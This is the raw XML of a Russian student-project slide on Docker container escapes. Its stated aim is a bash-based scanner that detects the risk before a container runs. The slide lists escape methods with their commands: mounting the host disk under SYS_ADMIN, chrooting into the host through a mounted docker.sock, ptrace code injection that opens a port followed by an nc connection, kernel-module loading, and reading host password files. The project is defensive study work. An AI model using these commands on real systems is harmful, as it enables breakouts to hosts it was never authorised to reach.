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30275212" cy="42803762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7320" cy="7147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513440" y="10015920"/>
            <a:ext cx="27247320" cy="11841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92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1513440" y="22982760"/>
            <a:ext cx="27247320" cy="11841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92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7320" cy="7147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1513440" y="10015920"/>
            <a:ext cx="13296600" cy="11841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92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15475320" y="10015920"/>
            <a:ext cx="13296600" cy="11841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92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15475320" y="22982760"/>
            <a:ext cx="13296600" cy="11841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92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1513440" y="22982760"/>
            <a:ext cx="13296600" cy="11841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92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7320" cy="7147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1513440" y="10015920"/>
            <a:ext cx="8773560" cy="11841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92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10726200" y="10015920"/>
            <a:ext cx="8773560" cy="11841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92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19938600" y="10015920"/>
            <a:ext cx="8773560" cy="11841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92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19938600" y="22982760"/>
            <a:ext cx="8773560" cy="11841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92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10726200" y="22982760"/>
            <a:ext cx="8773560" cy="11841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92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1513440" y="22982760"/>
            <a:ext cx="8773560" cy="11841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92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7320" cy="7147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1513440" y="10015920"/>
            <a:ext cx="27247320" cy="24825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7320" cy="7147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1513440" y="10015920"/>
            <a:ext cx="27247320" cy="24825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92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7320" cy="7147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1513440" y="10015920"/>
            <a:ext cx="13296600" cy="24825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92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15475320" y="10015920"/>
            <a:ext cx="13296600" cy="24825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92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7320" cy="7147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13440" y="1707840"/>
            <a:ext cx="27247320" cy="33134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7320" cy="7147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1513440" y="10015920"/>
            <a:ext cx="13296600" cy="11841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92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1513440" y="22982760"/>
            <a:ext cx="13296600" cy="11841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92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15475320" y="10015920"/>
            <a:ext cx="13296600" cy="24825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92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7320" cy="7147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1513440" y="10015920"/>
            <a:ext cx="13296600" cy="24825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92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15475320" y="10015920"/>
            <a:ext cx="13296600" cy="11841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92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15475320" y="22982760"/>
            <a:ext cx="13296600" cy="11841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92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7320" cy="7147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1513440" y="10015920"/>
            <a:ext cx="13296600" cy="11841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92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15475320" y="10015920"/>
            <a:ext cx="13296600" cy="11841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92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1513440" y="22982760"/>
            <a:ext cx="27247320" cy="11841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92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/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2081520" y="39672720"/>
            <a:ext cx="6811560" cy="22784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7DE7B4F9-A262-4A9C-8FDA-9861B8D844EE}" type="datetime">
              <a:rPr b="0" lang="ru-RU" sz="398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12.4.25</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="ru-RU" sz="398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/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10028520" y="39672720"/>
            <a:ext cx="10217520" cy="2278440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p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21381840" y="39672720"/>
            <a:ext cx="6811560" cy="227844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262F1708-348D-4073-978C-BF4617DA86B5}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="398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ru-RU" sz="398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1513440" y="1707840"/>
            <a:ext cx="27247320" cy="7147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title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1513440" y="10015920"/>
            <a:ext cx="27247320" cy="24825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92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92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6619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661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59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59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596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596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0" y="1104120"/>
            <a:ext cx="30274920" cy="10047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ru-RU" sz="6000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="203864"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Yu Mincho"/>
              </a:rPr>
              <a:t>ПОБЕГ ИЗ КОНТЕЙНЕРА DOCKER. УЯЗВИМОСТЬ DOCKER ESCAPE</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="ru-RU" sz="6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2" name="Picture 2" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="27470160" y="353880"/>
            <a:ext cx="2288160" cy="1306800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521640" y="260280"/>
            <a:ext cx="422424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ru-RU" sz="4000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="203864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ТЕМА ПРОЕКТА:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="ru-RU" sz="4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CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18591840" y="144000"/>
            <a:ext cx="11087280" cy="76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ru-RU" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="203864"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Будущее России: взгляд молодых!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45" name="Table 4"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="581400" y="2188080"/>
          <a:ext cx="29030040" cy="22141080"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="9497520"/>
                <a:gridCol w="1473120"/>
                <a:gridCol w="6757200"/>
                <a:gridCol w="303840"/>
                <a:gridCol w="10965600"/>
              </a:tblGrid>
              <a:tr h="7344000">
                <a:tc gridSpan="2"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2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ЦЕЛЬ: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="2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обеспечение безопасности пользователей при использовании контейнеров Docker от уязвимости Docker Escape с помощью статического анализа (до запуска самого контейнера).</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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2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ЗАДАЧИ:</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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457200" indent="-4568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ru-RU" sz="2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Yu Mincho"/>
                        </a:rPr>
                        <a:t>Исследовать возможность эксплуатации уязвимости Docker Escape</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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457200" indent="-4568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ru-RU" sz="2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Создать инструмент для анализа на наличие уязвимости</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="2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Yu Mincho"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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457200" indent="-4568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ru-RU" sz="2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Yu Mincho"/>
                        </a:rPr>
                        <a:t>Создать полезный продукт на основе FOSS ПО пригодный для использования в отечественных дистрибутива с использованием ПО из подписанных репозиториев.</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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ru-RU" sz="2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just">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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gridSpan="3"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2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АКТУАЛЬНОСТЬ:</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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ru-RU" sz="2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Yu Mincho"/>
                        </a:rPr>
                        <a:t>Побеги из контейнеров представляют собой существенный риск безопасности для организаций и пользователей. Это может быть критическим шагом в цепочке атак, которая может позволить хакерам получить доступ к файлам, к операционной системе, к устройствам. На текущий момент их всё ещё можно реализовать.</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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2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Yu Mincho"/>
                        </a:rPr>
                        <a:t>НОВИЗНА:</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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2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Yu Mincho"/>
                        </a:rPr>
                        <a:t>Существуют аналоги, распространяемые в формате бинарного дистрибутива. Предлагаемое решение реализовано посредством интерпретатора bash и встроенных инструментов Docker.</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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2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Yu Mincho"/>
                        </a:rPr>
                        <a:t>ПРАКТИЧЕСКАЯ ЗНАЧИМОСТЬ:</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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ru-RU" sz="2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Yu Mincho"/>
                        </a:rPr>
                        <a:t>Разработанный сканер позволит максимально ускорить проверку, проводя сканирование только наиболее интересных для нас уязвимостей, до запуска контейнера в продуктив.  Его можно встроить в CI/CD процессы. Использование этого инструмента ускорит работу широкой аудитории профильных специалистов по информационной безопасности: от системных администраторов и DevSecOps специалистов, до пентестеров, red team специалистов и аналитиков из ФСТЭК и ФСБ.</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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just">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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  <a:tr h="1798200">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr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1" lang="ru-RU" sz="2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ТЕРМИНЫ</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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just">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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1" lang="ru-RU" sz="2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DOCKER</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="2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 — одно из самых популярных приложений для контейнеризации программного обеспечения. </a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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gridSpan="3">
                  <a:txBody>
                    <a:bodyPr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1" lang="ru-RU" sz="2800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="333333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Yu Mincho"/>
                        </a:rPr>
                        <a:t>УЯЗВИМОСТЬ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="2800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="333333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Yu Mincho"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="ru-RU" sz="2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Yu Mincho"/>
                        </a:rPr>
                        <a:t>DOCKER ESCAPE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="2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Yu Mincho"/>
                        </a:rPr>
                        <a:t>, в переводе на русский язык означает «</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="ru-RU" sz="2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Yu Mincho"/>
                        </a:rPr>
                        <a:t>побег из Docker»</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="2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Yu Mincho"/>
                        </a:rPr>
                        <a:t> – наиболее раcпространенная уязвимость контейнеров Docker. Данная уязвимость позволяет в обход изоляции контейнеров получить доступ к (хостовой) операционной системе, тем самым совершая побег из контейнера Docker (Рисунок 1).</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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  <a:tr h="5363280">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="601"/>
                        </a:spcBef>
                      </a:pP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Bef>
                          <a:spcPts val="601"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="ru-RU" sz="2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DOCKER КОНТЕЙНЕРЫ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="2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— это стандартная единица программного обеспечения, которая упаковывает код и все его зависимости, чтобы можно было быстро и надёжно запустить приложение на разных операционных системах и в разных вычислительных средах. С технической точки зрения контейнер — это запущенный процесс (наподобие процессов в операционных системах), который изолирован. </a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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just">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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1" lang="ru-RU" sz="2800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="222222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Yu Mincho"/>
                        </a:rPr>
                        <a:t>DOCKER HUB </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="2800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="333333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Yu Mincho"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="2800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="222222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Yu Mincho"/>
                        </a:rPr>
                        <a:t>репозиторий, который позволяет разработчикам делиться своими контейнерами и находить готовые решения для своих проектов. </a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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just">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/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i="1" lang="ru-RU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Yu Mincho"/>
                        </a:rPr>
                        <a:t>Рисунок 1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ru-RU" sz="2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АНАЛИТИКА И СТАТИСТИКА</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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ru-RU" sz="1600" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="222222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Количество общедоступных образов Docker, размещенных на Docker Hub, имеющие критические уязвимости и содержащие вредоносные или потенциально опасные элементы.</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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ru-RU" sz="1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518400">
                <a:tc gridSpan="3"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ru-RU" sz="2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Yu Mincho"/>
                        </a:rPr>
                        <a:t>СПОСОБЫ РЕАЛИЗАЦИИ DOCKER ESCAPE</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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gridSpan="2"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ru-RU" sz="2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Yu Mincho"/>
                        </a:rPr>
                        <a:t>СКРИПТ ДЛЯ ПРОВЕРКИ КОНТЕЙНЕРОВ</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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  <a:tr h="9604440">
                <a:tc rowSpan="5"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2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Yu Mincho"/>
                        </a:rPr>
                        <a:t>1. Монтирование файловой системы</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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Yu Mincho"/>
                        </a:rPr>
                        <a:t>Необходимая настройка контейнера:</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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i="1" lang="ru-RU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Yu Mincho"/>
                        </a:rPr>
                        <a:t>Привилегия SYS_ADMIN</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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i="1" lang="ru-RU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Yu Mincho"/>
                        </a:rPr>
                        <a:t>Отключенная защита AppArmor</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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i="1" lang="ru-RU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Yu Mincho"/>
                        </a:rPr>
                        <a:t>Смонтированное  устройство с файловой системой хоста</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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Yu Mincho"/>
                        </a:rPr>
                        <a:t>На хосте:</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>docker run -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined --device=/dev/:/ ubuntu bash</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="2400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="203864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Yu Mincho"/>
                        </a:rPr>
                        <a:t>Привилегия SYS_ADMIN позволяет использовать команду mount внутри контейнера. С помощью этой команды можно смонтировать файловую систему хоста внутрь контейнера, тем самым получив к ней доступ.</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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Yu Mincho"/>
                        </a:rPr>
                        <a:t>В контейнере:</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>mount /dev/&lt;DeviceName&gt; /mnt</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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1" lang="ru-RU" sz="2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Yu Mincho"/>
                        </a:rPr>
                        <a:t>2. Побег через Docker Socket</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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1" lang="ru-RU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Yu Mincho"/>
                        </a:rPr>
                        <a:t>Необходимая настройка контейнера:</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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i="1" lang="ru-RU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Yu Mincho"/>
                        </a:rPr>
                        <a:t>Смонтированный Docker Socket</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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1" lang="ru-RU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Yu Mincho"/>
                        </a:rPr>
                        <a:t>На хосте:</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>docker run -it -v /var/run/docker.sock:/run/docker.sock ubuntu bash</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="2400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="203864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Yu Mincho"/>
                        </a:rPr>
                        <a:t>docker.sock – это файл, который может давать команды демону (процессу, который контролирует создание контейнеров). Если смонтировать docker.sock в контейнер, он получает право создавать другие контейнеры.</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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ru-RU" sz="2400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="203864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Yu Mincho"/>
                        </a:rPr>
                        <a:t>Несмотря на то, что данный контейнер не может получить доступ к файлам хоста напрямую, он может создать другой привилегированный контейнер, в который будет смонтирована основная файловая система, и получить доступ через него.</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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1" lang="ru-RU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Yu Mincho"/>
                        </a:rPr>
                        <a:t>В контейнере:</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>docker run -it --privileged -v /:/host/ ubuntu bash -c "chroot /host/«</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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just">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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1" lang="ru-RU" sz="2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Yu Mincho"/>
                        </a:rPr>
                        <a:t>3. Внедрение кода в процесс</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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1" lang="ru-RU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Yu Mincho"/>
                        </a:rPr>
                        <a:t>Необходимая настройка контейнера:</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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i="1" lang="ru-RU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Yu Mincho"/>
                        </a:rPr>
                        <a:t>Привилегия SYS_PTRACE</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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i="1" lang="ru-RU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Yu Mincho"/>
                        </a:rPr>
                        <a:t>Отключенная защита AppArmor</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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i="1" lang="ru-RU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Yu Mincho"/>
                        </a:rPr>
                        <a:t>Процессы в хосте и в контейнере должны находиться в одном пространстве имён</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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1" lang="ru-RU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Yu Mincho"/>
                        </a:rPr>
                        <a:t>На хосте (запуск контейнера через сервер Python):</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>/usr/bin/python3 -m http.server 8080 &amp;</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>docker run -it --pid=host --cap-add=SYS_PTRACE --security-opt apparmor=unconfined ubuntu bash</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="2400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="203864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Yu Mincho"/>
                        </a:rPr>
                        <a:t>Привилегия SYS_PTRACE позволяет контейнеру просматривать процессы хоста и вставлять в них исполняемый код, чем может воспользоваться злоумышленник</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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1" lang="ru-RU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Yu Mincho"/>
                        </a:rPr>
                        <a:t>В контейнере:</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>apt</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>install vim</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>apt install gcc</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>apt install net-tools</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>apt install netcat</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>ps -eaf | grep "/usr/bin/python3 -m http.server 8080" | head -n 1 </a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>vim inject.c #Просмотр запущенных процессов</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>#Код, который будет открывать порт 5600 на хосте для подключения</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>gcc -o inject inject.c</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>./inject &lt;PID&gt;</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>nc &lt;HOST-IP&gt; 5600</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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just">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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1" lang="ru-RU" sz="2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Yu Mincho"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="ru-RU" sz="2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Yu Mincho"/>
                        </a:rPr>
                        <a:t>4. Добавление модуля ядра</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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1" lang="ru-RU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Yu Mincho"/>
                        </a:rPr>
                        <a:t>Необходимая настройка контейнера:</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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i="1" lang="ru-RU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Yu Mincho"/>
                        </a:rPr>
                        <a:t>Привилегия SYS_MODULE</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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i="1" lang="ru-RU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Yu Mincho"/>
                        </a:rPr>
                        <a:t>Установленные заголовки ядра</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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i="1" lang="ru-RU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Yu Mincho"/>
                        </a:rPr>
                        <a:t>Контейнер с такой же версией ОС, как у хоста</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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 gridSpan="2" rowSpan="5">
                  <a:txBody>
                    <a:bodyPr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1" lang="ru-RU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Yu Mincho"/>
                        </a:rPr>
                        <a:t>На хосте:</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>docker run –it --cap-add=SYS_MODULE ubuntu:&lt;HOST-OS-VERSION&gt; bash</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="2400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="203864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Yu Mincho"/>
                        </a:rPr>
                        <a:t>SYS_MODULE позволяет контейнеру менять модули ядра.</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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1" lang="ru-RU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Yu Mincho"/>
                        </a:rPr>
                        <a:t>В контейнере:</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>apt</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>install vim</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>apt install gcc</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>apt install net-tools</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>apt install netcat</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>ps -eaf | grep "/usr/bin/python3 -m http.server 8080" | head -n 1 </a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>vim inject.c #Просмотр запущенных процессов</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>#Код, который будет открывать порт 5600 на хосте для подключения</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>gcc -o inject inject.c</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>./inject &lt;PID&gt;</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>nc &lt;HOST-IP&gt; 5600</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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just">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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2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Yu Mincho"/>
                        </a:rPr>
                        <a:t>5. Чтение файлов с хоста</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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Yu Mincho"/>
                        </a:rPr>
                        <a:t>Необходимая настройка контейнера:</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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Yu Mincho"/>
                        </a:rPr>
                        <a:t>Привилегия</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="ru-RU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Yu Mincho"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a: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Yu Mincho"/>
                        </a:rPr>
                        <a:t>DAC_READ_SEARCH</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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Yu Mincho"/>
                        </a:rPr>
                        <a:t>Открытый ssh-порт</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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ru-RU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Yu Mincho"/>
                        </a:rPr>
                        <a:t>На хосте:</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>sudo apt install openssh-server</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>sudo docker run -it --cap-add=DAC_READ_SEARCH ubuntu bash</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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2400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="203864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Yu Mincho"/>
                        </a:rPr>
                        <a:t>Привилегия DAC_READ_SEARCH позволяет контейнеру читать файлы хоста. Злоумышленник может считать пароли и подключиться к хосту через ssh.</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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1" lang="ru-RU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Yu Mincho"/>
                        </a:rPr>
                        <a:t>В контейнере:</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>apt install -y vim</a:t>
                      </a:r>
